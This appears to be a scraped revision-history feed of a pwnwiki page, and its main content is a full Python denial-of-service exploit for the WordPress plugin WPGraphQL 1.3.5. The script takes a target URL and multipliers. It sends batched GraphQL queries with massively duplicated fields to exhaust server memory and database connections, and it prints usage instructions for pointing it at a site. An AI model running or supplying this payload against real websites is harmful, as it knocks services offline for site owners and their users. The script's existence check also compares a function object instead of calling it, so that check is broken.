https://pwnwiki.com/index.php?action=history&feed=atom&title=WordPress_Plugin_WPGraphQL_1.3.5_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E
WordPress Plugin WPGraphQL 1.3.5 拒絕服務漏洞 - Revision history
2026-04-07T23:32:55Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=WordPress_Plugin_WPGraphQL_1.3.5_%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&diff=1906&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: WordPress Plugin WPGraphQL 1.3.5 - Denial of Service # Author: Dolev Farhi # Date: 2021-04-12 # Vendor Homepage: https://www.wpgraphql.com/ # V..."
2021-04-27T11:44:54Z
<p>Created page with "==EXP== <pre> # Exploit Title: WordPress Plugin WPGraphQL 1.3.5 - Denial of Service # Author: Dolev Farhi # Date: 2021-04-12 # Vendor Homepage: https://www.wpgraphql.com/ # V..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: WordPress Plugin WPGraphQL 1.3.5 - Denial of Service <br />
# Author: Dolev Farhi<br />
# Date: 2021-04-12<br />
# Vendor Homepage: https://www.wpgraphql.com/<br />
# Version: 1.3.5 <br />
# Tested on: Ubuntu<br />
<br />
<br />
"""<br />
This attack uses duplication of fields amplified by GraphQL batched queries, resulting in server OOM and MySQL connection errors.<br />
"""<br />
<br />
import sys<br />
import requests<br />
<br />
<br />
def usage():<br />
print('* WordPress GraphQL 1.3.5 Denial of Service *')<br />
print('python {} <wordpress_url> <number_of_field_duplications> <number_of_chained_queries>'.format(sys.argv[0]))<br />
print('python {} http://site.com 10000 100'.format(sys.argv[0]))<br />
sys.exit(1)<br />
<br />
if len(sys.argv) < 4:<br />
print('Missing arguments!')<br />
usage()<br />
<br />
def wpgql_exists():<br />
try:<br />
r = requests.post(WORDPRESS_URL, json='x')<br />
if 'GraphQL' in r.json()['errors'][0]['message']:<br />
return True<br />
except:<br />
pass<br />
return False<br />
<br />
# This PoC assumes graphql is located at index.php?graphql<br />
WORDPRESS_URL = sys.argv[1] + '/index.php?graphql'<br />
FORCE_MULTIPLIER = int(sys.argv[2])<br />
CHAINED_REQUESTS = int(sys.argv[3])<br />
<br />
if wpgql_exists is False:<br />
print('Could not identify GraphQL running at "/index.php?graphql"')<br />
sys.exit(1)<br />
<br />
queries = []<br />
<br />
payload = 'content \n comments { \n nodes { \n content } }' * FORCE_MULTIPLIER<br />
query = {'query':'query { \n posts { \n nodes { \n ' + payload + '} } }'}<br />
<br />
for _ in range(0, CHAINED_REQUESTS):<br />
queries.append(query)<br />
<br />
r = requests.post(WORDPRESS_URL, json=queries)<br />
print('Time took: {} seconds '.format(r.elapsed.total_seconds()))<br />
print('Response:', r.json())<br />
<br />
</pre></div>
Pwnwiki